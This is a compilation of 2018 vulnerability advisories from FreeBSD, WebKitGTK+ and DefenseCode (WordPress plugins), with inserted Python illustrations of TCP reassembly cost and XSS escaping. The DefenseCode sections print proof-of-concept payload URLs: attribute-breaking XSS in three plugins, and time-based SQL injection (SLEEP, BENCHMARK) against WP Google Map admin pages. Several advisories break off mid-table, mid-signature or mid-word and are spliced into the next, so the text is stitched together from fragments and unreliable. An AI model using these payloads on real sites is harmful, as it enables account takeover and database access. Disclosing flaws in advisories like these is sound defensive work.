FreeBSD Security Advisory FreeBSD-SA-18:08.tcp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:08.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in TCP reassembly

Category:       core
Module:         inet
Announced:      2018-08-06
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
                2018-08-06 17:47:47 UTC (releng/11.2, 11.2-RELEASE-p1)
                2018-08-06 17:48:46 UTC (releng/11.1, 11.1-RELEASE-p12)
                2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
                2018-08-06 17:50:40 UTC (releng/10.4, 10.4-RELEASE-p10)
CVE Name:       CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service. To transmit a stream of data, TCP breaks the data stream
into segments for transmission through the Internet, and reassembles the
segments at the receiving side to recreate the data stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly handling,
with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems to
only accept TCP connections from trusted end-stations, if it is possible
to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue. The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size of
each TCP connection's reassembly queue. The value is controlled by a
sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum number
of TCP segments that can be outstanding on a session's reassembly queue.
This value defaults to 100.

Note that setting this value too low could impact the throughput of TCP
connections which experience significant loss or reordering. However,
the higher this number is set, the more resources can be consumed on TCP
reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r337392
releng/10.4/                                                      r337389
stable/11/                                                        r337391
releng/11.1/                                                      r337388
releng/11.2/
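The advisory states the cost (per-segment work linear in the queue length) but does not show why a flood of small out-of-order segments is so cheap for the attacker and so expensive for the victim. The following Python model is an added illustration, not FreeBSD kernel code and not part of the advisory: it keeps the reassembly queue as a list that is walked from the head on every insert, counts comparisons, and applies an optional per-connection cap that plays the role of net.inet.tcp.reass.maxqueuelen. The segment counts, the 1-byte segment size and the assumption that the kernel scans from the head are illustration choices; only the default cap of 100 comes from the advisory.

```python
"""Cost model for FreeBSD-SA-18:08.tcp (CVE-2018-6922).

Constructed illustration, not FreeBSD kernel code: a reassembly queue that is
walked from the head on every insert, so the work per segment grows with the
queue length and the total work for an out-of-order flood grows quadratically.
maxqueuelen models the per-connection cap that the advisory's patch adds
(net.inet.tcp.reass.maxqueuelen, default 100).
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class ReassemblyQueue:
    """Out-of-order segments held as a list sorted by sequence number."""
    maxqueuelen: Optional[int] = None            # None models the unpatched kernel
    segments: List[Tuple[int, int]] = field(default_factory=list)  # (seq, length)
    work: int = 0                                # comparisons performed so far
    dropped: int = 0                             # segments refused by the cap

    def insert(self, seq: int, length: int) -> bool:
        """Insert one segment; return False if the cap rejected it."""
        if self.maxqueuelen is not None and len(self.segments) >= self.maxqueuelen:
            self.dropped += 1
            return False
        # Linear scan from the head to find the insertion point: this is the
        # per-segment cost that the advisory says grows with queue length.
        i = 0
        while i < len(self.segments) and self.segments[i][0] < seq:
            self.work += 1
            i += 1
        self.segments.insert(i, (seq, length))
        return True


def attack_cost(n_segments: int, maxqueuelen: Optional[int] = None,
                mss: int = 1) -> Tuple[int, int, int]:
    """Simulate the attacker pattern: never send the first in-order byte, so
    nothing can be delivered to the application, then send n tiny segments
    with ascending sequence numbers. Each one lands at the tail after a full
    walk of the queue. Returns (comparisons, queue length, segments dropped)."""
    q = ReassemblyQueue(maxqueuelen=maxqueuelen)
    for k in range(n_segments):
        q.insert(1 + k * mss, mss)      # seq 0 is deliberately never sent
    return q.work, len(q.segments), q.dropped


if __name__ == "__main__":
    for n in (100, 1000, 2000):
        unpatched = attack_cost(n)
        capped = attack_cost(n, maxqueuelen=100)
        print(f"{n:5d} segments: unpatched work={unpatched[0]:>8d}  "
              f"capped work={capped[0]:>5d} dropped={capped[2]}")
```

With 2000 one-byte segments the unpatched queue performs about two million comparisons for roughly 100 KiB of attacker traffic, while the capped queue stops at 4950 comparisons and drops the rest; that bounded cost is exactly the trade-off the advisory describes, since legitimate connections with heavy reordering lose the dropped segments too. On a patched FreeBSD host the cap in effect can be read with `sysctl net.inet.tcp.reass.maxqueuelen`.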
DefenseCode ThunderScan SAST Advisory: WordPress Strong Testimonials Plugin Multiple XSS Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Strong Testimonials Plugin Multiple XSS Security Vulnerabilities

Advisory ID:     DC-2018-05-007
Advisory Title:  WordPress Strong Testimonials Plugin Multiple XSS Vulnerabilities
Advisory URL:    http://www.defensecode.com/advisories.php
Software:        WordPress Strong Testimonials plugin
Language:        PHP
Version:         2.31.4 and below
Vendor Status:   Vendor contacted, update released
Release Date:    2018/07/24
Risk:            Medium

1. General Overview
===================

During the security audit of Strong Testimonials plugin for WordPress CMS, multiple XSS vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com

2. Software Overview
====================

According to the plugin developers, with Strong Testimonials plugin you will be collecting and publishing your testimonials or reviews. Beginners and pros alike will appreciate the wealth of flexible features refined over 4 years from user feedback and requests.

According to wordpress.org, it has more than 50,000 active installs.

Homepage:
https://wordpress.org/plugins/strong-testimonials/

3. Vulnerability Description
============================

During the security analysis, ThunderScan discovered Cross-Site Scripting vulnerabilities in Strong Testimonials WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question.

The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, or posting it as part of a comment on the vulnerable site or another forum.

3.1 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_REQUEST['id']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/edit.php?post_type=wpm-testimonial&page=testimonial-views&action=edit&id=2";>alert(42)
    File: strong-testimonials/admin/views.php
    ---------
    48   wpmtst_view_settings( $_REQUEST['action'], $_REQUEST['id'] );
    ...
    106  function wpmtst_view_settings( $action = '', $view_id = null ) {
    ...
    213
    ---------

3.2 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_REQUEST['id']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/edit.php?post_type=wpm-testimonial&page=testimonial-views&action=edit&id=2";>alert(42)
    File: strong-testimonials/admin/views.php
    ---------
    48   wpmtst_view_settings( $_REQUEST['action'], $_REQUEST['id'] );
    ...
    106  function wpmtst_view_settings( $action = '', $view_id = null ) {
    ...
    219
    ---------
    File: strong-testimonials/admin/partials/views/view-shortcode.php
    ---------
    5    $shortcode .= '';
    ...
    21
    ---------

4. Solution
===========

After the vulnerabilities were reported, the vendor resolved the security issues. All users are strongly advised to update WordPress Strong Testimonials plugin to the latest available version.

5. Credits
==========

Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer.

6. Disclosure Timeline
======================

2018/05/24  Vulnerabilities discovered
2018/05/29  Vendor contacted
2018/06/01  Update released
2018/07/24  Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
DefenseCode ThunderScan SAST Advisory: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability
DefenseCode ThunderScan SAST Advisory: WordPress Gwolle Guestbook Plugin XSS Security Vulnerability

Advisory ID:     DC-2018-05-008
Advisory Title:  WordPress Gwolle Guestbook Plugin XSS Security Vulnerability
Advisory URL:    http://www.defensecode.com/advisories.php
Software:        WordPress Gwolle Guestbook plugin
Language:        PHP
Version:         2.5.3 and below
Vendor Status:   Vendor contacted, update released
Release Date:    2018/07/24
Risk:            Medium

1. General Overview
===================

During the security audit of Gwolle Guestbook plugin for WordPress CMS, a security vulnerability was discovered using DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com

2. Software Overview
====================

According to the plugin developers, Gwolle Guestbook is not just another guestbook for WordPress. The goal is to provide an easy and slim way to integrate a guestbook into your WordPress powered site.

According to wordpress.org, it has more than 40,000 active installs.

Homepage:
https://wordpress.org/plugins/gwolle-gb/

3. Vulnerability Description
============================

During the security analysis, ThunderScan discovered a Cross-Site Scripting vulnerability in Gwolle Guestbook WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question.

The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, or posting it as part of a comment on the vulnerable site or another forum.

To confirm the vulnerability, make sure the dashboard widget is added and that there is at least one unchecked entry in the guestbook. The vulnerability was tested using the Apache web server. Note that the reflected value is $_SERVER['PHP_SELF'], so the payload travels in the request path (the PATH_INFO after index.php) rather than in a query parameter.

3.1 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_SERVER['PHP_SELF']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/index.php/";>alert(42)
    File: gwolle-gb/admin/gb-dashboard-widget.php
    ---------
    150
    ---------

4. Solution
===========

All users are strongly advised to update WordPress Gwolle Guestbook plugin to the latest available version.

5. Credits
==========

Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer.

6. Disclosure Timeline
======================

2018/06/01  Vulnerability discovered
2018/06/05  Vendor contacted
2018/07/24  Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
DefenseCode ThunderScan SAST Advisory: WordPress Snazzy Maps Plugin Multiple XSS Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress Snazzy Maps Plugin Multiple XSS Security Vulnerabilities

Advisory ID:     DC-2018-05-006
Advisory Title:  WordPress Snazzy Maps Plugin Multiple XSS Vulnerabilities
Advisory URL:    http://www.defensecode.com/advisories.php
Software:        WordPress Snazzy Maps plugin
Language:        PHP
Version:         1.1.3 and below
Vendor Status:   Vendor contacted, no response
Release Date:    2018/07/24
Risk:            Medium

1. General Overview
===================

During the security audit of Snazzy Maps plugin for WordPress CMS, multiple Cross-Site Scripting (XSS) vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com

2. Software Overview
====================

According to the plugin developers, Snazzy Maps can apply styles to your Google Maps with the official Snazzy Maps WordPress plugin.

According to wordpress.org, it has more than 60,000 active installs.

Homepage:
https://wordpress.org/plugins/snazzy-maps/

3. Vulnerability Description
============================

During the security analysis, ThunderScan discovered multiple Cross-Site Scripting vulnerabilities in Snazzy Maps WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question.

The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, or posting it as part of a comment on the vulnerable site or another forum.

3.1 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_GET['text']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/themes.php?page=snazzy_maps&tab=1&text=";>alert(42)
    File: snazzy-maps/admin/explore.php
    ---------
    28   $text = isset($_GET['text']) ? $_GET['text'] : '';
    ...
    34
    ---------

3.2 Cross-Site Scripting
    Vulnerable Function:  echo()
    Vulnerable Variable:  $_GET['tab']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/themes.php?page=snazzy_maps&tab=1";>alert(42)
    File: snazzy-maps/admin/index.php
    ---------
    69   $active_tab = isset($_GET['tab']) ? $_GET['tab'] : '0';
    ...
    98   Dismiss
    ---------

4. Solution
===========

All users are strongly advised to update WordPress Snazzy Maps plugin to the latest available version as soon as the vendor releases an update that fixes the vulnerabilities.

5. Credits
==========

Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer.

6. Disclosure Timeline
======================

2018/05/21  Vulnerabilities discovered
2018/05/21  Vendor contacted
2018/07/24  Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
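The three DefenseCode XSS advisories above (Strong Testimonials, Gwolle Guestbook, Snazzy Maps) share one defect: a request value (a query parameter, or in the Gwolle case the request path via $_SERVER['PHP_SELF']) is echoed into a double-quoted HTML attribute without escaping, and the `"` in the payload closes the attribute so the rest of the value becomes new markup. The following Python is an added illustration, not the plugins' PHP and not DefenseCode's code: the input values are constructed, the render functions stand in for the echo() sinks the advisories name, and the parser-based check is the kind of regression test a reviewer would want for such a fix. In the actual plugins the equivalent of `html.escape(..., quote=True)` is WordPress's `esc_attr()`, and for the PHP_SELF case the cleaner fix is to stop reading the request path at all and build the form action with `admin_url()`.

```python
"""Attribute-context reflected XSS, as in the Strong Testimonials, Gwolle
Guestbook and Snazzy Maps advisories. Constructed illustration in Python,
not the plugins' PHP: the request values are invented and the render
functions stand in for the echo() sinks the advisories name."""
import html
from html.parser import HTMLParser

# Constructed inputs: a benign id, an attribute break-out payload of the kind
# the advisories' URLs carry, and a PHP_SELF-style request path (Gwolle case,
# where the payload travels in the path rather than in a query parameter).
BENIGN_ID = "2"
PAYLOAD_ID = '2"><script>alert(42)</script>'
PAYLOAD_PATH = '/wp-admin/index.php/"><script>alert(42)</script>'


def render_vulnerable(value: str) -> str:
    """echo of a request value straight into a double-quoted attribute."""
    return f'<input type="hidden" name="id" value="{value}">'


def render_escaped(value: str) -> str:
    """Same sink with attribute escaping: html.escape(quote=True) turns
    & < > " ' into entities, the same set WordPress esc_attr() encodes."""
    return f'<input type="hidden" name="id" value="{html.escape(value, quote=True)}">'


def render_form_vulnerable(php_self: str) -> str:
    """Gwolle pattern: a form action built from the request path."""
    return f'<form method="post" action="{php_self}"></form>'


def render_form_escaped(php_self: str) -> str:
    """Escape the path too; better still, do not derive it from the request."""
    return f'<form method="post" action="{html.escape(php_self, quote=True)}"></form>'


class _ScriptCounter(HTMLParser):
    """Tokenizes markup the way a browser would and counts <script> start
    tags, so a test can assert that a reflected value never becomes a new
    element regardless of what the value contains."""
    def __init__(self) -> None:
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def count_script_elements(markup: str) -> int:
    parser = _ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts
```

The check counts elements after parsing rather than grepping for the string `<script`, so it also catches payloads that a naive string filter would miss once the browser has re-tokenized the page; the escaped renderings keep the payload inside the attribute value, where it is inert text.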
FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-18:07.lazyfpu                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Lazy FPU State Restore Information Disclosure

Category:       core
Module:         kernel
Announced:      2018-06-21
Credits:        Julian Stecklina from Amazon Germany
                Thomas Prescher from Cyberus Technology GmbH
                Zdenek Sojka from SYSGO AG
                Colin Percival
Affects:        All supported versions of FreeBSD.
Corrected:      2018-06-14 18:50:49 UTC (stable/11, 11.2-PRERELEASE)
                2018-06-15 13:21:37 UTC (releng/11.2, 11.2-RC3)
                2018-06-21 05:17:13 UTC (releng/11.1, 11.1-RELEASE-p11)
CVE Name:       CVE-2018-3665

Special Note:   This advisory only addresses this issue for FreeBSD 11.x
                on i386 and amd64. We expect to update this advisory to
                include 10.x in the near future.

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

Modern CPUs have a floating point unit (FPU) which needs to maintain
state per thread. One technique is to only save and to only restore the
FPU state for a thread when a thread attempts to utilize the FPU. This
technique is called Lazy FPU state restore.

II.  Problem Description

A subset of Intel processors can allow a local thread to infer data from
another thread through a speculative execution side channel when Lazy
FPU state restore is used.

III. Impact

Any local thread can potentially read FPU state information from other
threads running on the host. This could include cryptographic keys when
the AES-NI CPU feature is present.

IV.  Workaround

No workaround is available, but non-Intel branded CPUs are not believed
to be vulnerable.

V.   Solution

The patch changes from Lazy FPU state restore to Eager FPU state
restore. This new technique is the recommended practice from Intel and
in some cases can actually increase performance, depending on workload.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:07/lazyfpu-11.patch.asc
# gpg --verify lazyfpu-11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r335169
releng/11.2/                                                      r335196
releng/11.1/                                                      r335465
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00145.html>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3665>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:07.lazyfpu.asc>

-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlsrN1hfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cJTLA/+Kt7QLkNCVudaiE+d+VMuC2f1aGhqoyd
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0005
WebKitGTK+ and WPE WebKit Security Advisory                    WSA-2018-0005

Date reported           : June 13, 2018
Advisory ID             : WSA-2018-0005
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0005.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0005.html
CVE identifiers         : CVE-2018-4190, CVE-2018-4192, CVE-2018-4199,
                          CVE-2018-4201, CVE-2018-4214, CVE-2018-4218,
                          CVE-2018-4222, CVE-2018-4232, CVE-2018-4233,
                          CVE-2018-11646, CVE-2018-11712, CVE-2018-11713,
                          CVE-2018-12293, CVE-2018-12294.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2018-4190
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Jun Kokatsu (@shhnjk).
    Impact: Visiting a maliciously crafted website may leak sensitive data.
    Description: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.

CVE-2018-4192
    Versions affected: WebKitGTK+ before 2.20.1.
    Credit to Markus Gaasedelen, Nick Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: A race condition was addressed with improved locking.

CVE-2018-4199
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Alex Plaskett, Georgi Geshev, Fabi Beterke, and Nils of MWR Labs working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2018-4201
    Versions affected: WebKitGTK+ before 2.20.1.
    Credit to an anonymous researcher.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4214
    Versions affected: WebKitGTK+ before 2.20.0.
    Credit to OSS-Fuzz.
    Impact: Processing maliciously crafted web content may lead to an unexpected application crash.
    Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-4218
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Natalie Silvanovich of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4222
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Natalie Silvanovich of Google Project Zero.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: An out-of-bounds read was addressed with improved input validation.

CVE-2018-4232
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Aymeric Chaib.
    Impact: Visiting a maliciously crafted website may lead to cookies being overwritten.
    Description: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.

CVE-2018-4233
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Samuel Groß (@5aelo) working with Trend Micro's Zero Day Initiative.
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution.
    Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-11646
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to Mishra Dhiraj.
    Maliciously crafted web content could trigger an application crash in WebKitFaviconDatabase, caused by mishandling unexpected input.

CVE-2018-11712
    Versions affected: WebKitGTK+ 2.20.0 and 2.20.1.
    Credit to Metrological Group B.V.
    The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections.

CVE-2018-11713
    Versions affected: WebKitGTK+ before 2.20.0 or without libsoup 2.62.0.
    Credit to Dirkjan Ochtman.
    The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted web sites via a WebSocket connection.

CVE-2018-12293
    Versions affected: WebKitGTK+ before 2.20.3 and WPE WebKit before 2.20.1.
    Credit to ADlab of Venustech.
    Maliciously crafted web content could achiev
DefenseCode ThunderScan SAST Advisory: WordPress WP Google Map Plugin Multiple SQL injection Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory: WordPress WP Google Map Plugin Multiple SQL injection Security Vulnerabilities

Advisory ID:     DC-2018-05-002
Advisory Title:  WordPress WP Google Map Plugin Multiple SQL injection Vulnerabilities
Advisory URL:    http://www.defensecode.com/advisories.php
Software:        WordPress WP Google Map plugin
Language:        PHP
Version:         4.0.4 and below
Vendor Status:   Vendor contacted, no response
Release Date:    2018/06/12
Risk:            High

1. General Overview
===================

During the security audit of WP Google Map plugin for WordPress CMS, multiple SQL injection vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com

2. Software Overview
====================

According to the plugin developers, WP Google Map is #1 Google Maps plugin for WordPress. It allows you to create google maps shortcodes to display responsive google maps on pages, widgets and custom templates.

According to wordpress.org, it has more than 100,000 active installs.

Homepage:
https://wordpress.org/plugins/wp-google-map-plugin/
https://www.wpmapspro.com/

3. Vulnerability Description
============================

During the security analysis, ThunderScan discovered SQL injection vulnerabilities in WP Google Map WordPress plugin.

The easiest way to reproduce the vulnerabilities is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerabilities provide to either escalate their privileges or obtain and modify database contents they were not supposed to be able to.

Due to the missing nonce token, the vulnerable code is also directly exposed to attack vectors such as Cross-Site Request Forgery (CSRF).

3.1 SQL injection
    Vulnerable Function:  $wpdb->get_results()
    Vulnerable Variable:  $_GET['order']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(4200,MD5(0x42424242),42)
    File: wp-google-map-plugin/core/class.tabular.php
    ---------
    520  $order = ( ! empty( $_GET['order'] ) ) ? wp_unslash( $_GET['order'] ) : 'asc';
    ...
    522  $query_to_run .= " order by {$orderby} {$order}";
    ...
    530  $this->data = $wpdb->get_results( $query_to_run );
    ---------

3.2 SQL injection
    Vulnerable Function:  $wpdb->get_results()
    Vulnerable Variable:  $_GET['orderby']
    Vulnerable URL:
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
    File: wp-google-map-plugin/core/class.tabular.php
    ---------
    519  $orderby = ( ! empty( $_GET['orderby'] ) ) ? wp_unslash( $_GET['orderby'] ) : $this->primary_col;
    ...
    522  $query_to_run .= " order by {$orderby} {$order}";
    ...
    530  $this->data = $wpdb->get_results( $query_to_run );
    ---------

4. Solution
===========

All users are strongly advised to update WordPress WP Google Map plugin to the latest available version as soon as the vendor releases an update that fixes the vulnerabilities.

5. Credits
==========

Discovered by Neven Biruski using DefenseCode ThunderScan source code security analyzer.

6. Disclosure Timeline
======================

2018/05/11  Vulnerabilities discovered
2018/05/16  Vendor contacted
2018/06/08  No response
2018/06/12  Advisory released to the public

7. About DefenseCode
====================

DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
